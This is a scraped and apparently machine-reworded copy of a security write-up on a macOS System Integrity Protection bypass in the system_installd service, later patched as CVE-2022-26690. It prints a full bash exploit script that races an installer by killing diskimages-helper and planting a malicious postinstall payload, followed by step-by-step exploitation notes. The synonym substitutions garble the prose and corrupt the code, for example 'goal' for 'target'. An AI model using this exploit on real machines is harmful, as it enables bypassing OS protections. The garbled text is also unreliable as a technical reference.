Diving into an Previous Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities

0
85

[ad_1]
[*][*]
A brand new bypass seems
In keeping with the aforementioned patch, we are able to see that if we are able to bypass the amount path examine at line 81, then the system_installd service will spawn the script instantly as an alternative of resorting to the remoted XPC service.
The query then is, how can we bypass the amount path examine? By debugging, we discovered that the vacation spot quantity path returned at line 80 is an arbitrary mounted DMG quantity path that we specified from the installer command line.
So what occurs if we eject the DMG quantity instantly earlier than the examine? Testing this inquiry, we discovered that it will return the foundation quantity at line 80 and bypass the examine at line 81 as anticipated.
Right here is how the exploitation works utilizing a bash script:
#!/bin/bashecho “[*] making ready the payload…”MOUNT_DIR=”/tmp/.exploit”PAYLOAD_DIR=”$MOUNT_DIR/payload”PAYLOAD_POST_PATH=”$PAYLOAD_DIR/postinstall”PAYLOAD_PRE_PATH=”$PAYLOAD_DIR/preinstall”mkdir -p “$PAYLOAD_DIR”# create postinstall scriptecho “#!/bin/bash” > “$PAYLOAD_POST_PATH”echo $1 >> “$PAYLOAD_POST_PATH”chmod +x “$PAYLOAD_POST_PATH”# create preinstall script simply to make the exploit extra elegantecho “#!/bin/bash” > “$PAYLOAD_PRE_PATH”echo “echo ‘only a place holder, our payload is within the postinstall.'” >> “$PAYLOAD_PRE_PATH”chmod +x “$PAYLOAD_PRE_PATH”echo “[*] making ready the dmg mounting…”hdiutil create -size 50m -volname .exploit -ov disk.dmghdiutil connect -mountpoint $MOUNT_DIR disk.dmgsudo echo “[*] all of the preparations are accomplished.”sudo installer -pkg $2 -target $MOUNT_DIR &echo “[*] ready for installer…”whereas true ; do    goal=`compgen -G “$MOUNT_DIR/.PKInstallSandboxManager-SystemSoftware/*/OpenPath*/Scripts/*/postinstall”`    if [ $target ]; then          #hdiutil detach $MOUNT_DIR          #detach is sluggish, kill the method will assist us eject the dmg instantly, to win the race situation.          kill -9 `pgrep diskimages`          # re-create the scripts path and put our payload inside.          TARGET_DIR=”${goal%’postinstall’}”          echo “[*] re-creating goal path: $TARGET_DIR”          mkdir -p “$TARGET_DIR”          mv “$PAYLOAD_DIR/*” “$TARGET_DIR”          echo “[*] changed goal: $goal”          break    fidoneecho “[*] all accomplished. get pleasure from :P”
Right here’s how the exploit works:

       Earlier than putting in a PKG file, create a malicious post-install script after which mount a DMG quantity
       Use the installer command to put in an Apple-signed package deal to the DMG quantity
       Monitor the file creation of the post-install script within the DMG quantity
       As soon as discovered, eject the DMG quantity instantly, after which recreate the identical listing on the foundation quantity
       Transfer the beforehand ready payload script into the listing
       Look ahead to the payload script to be executed in a SIP-Bypass context

There’s a small trick used on this exploit: the detach subcommand of hdiutil is just too sluggish to win the race situation. The quickest manner is to kill the diskimages-helper course of instantly.
The bash exploitation ought to have labored, however it failed. It is because the shell script is so sluggish, it at all times loses the race situation. Nonetheless, rewriting the logic in C language would trigger the script to work.
A brand new patch
Apple addressed the difficulty with CVE-2022-26690.
Earlier than launching the package deal scripts, it’ll examine whether or not the scripts listing is restricted (trusted). If not, it’ll use the protected and remoted XPC service to launch the script.
This logic works for 3 causes:

      In a traditional situation, the scripts listing is restricted for Apple-signed packages. It’s inside a restricted path, /Library/Apple/. Thus, the script inside might be trusted and will likely be spawned instantly.
      If put in to a mounted DMG quantity, the scripts listing just isn’t restricted, though it was created by the API, rootless_mkdir_restricted. So, the script inside a DMG quantity is untrusted and ought to be launched by the remoted XPC service.       
      If the DMG quantity is ejected, the scripts listing will disappear. Even when the identical path is created, it won’t be restricted.

 

[*][ad_2]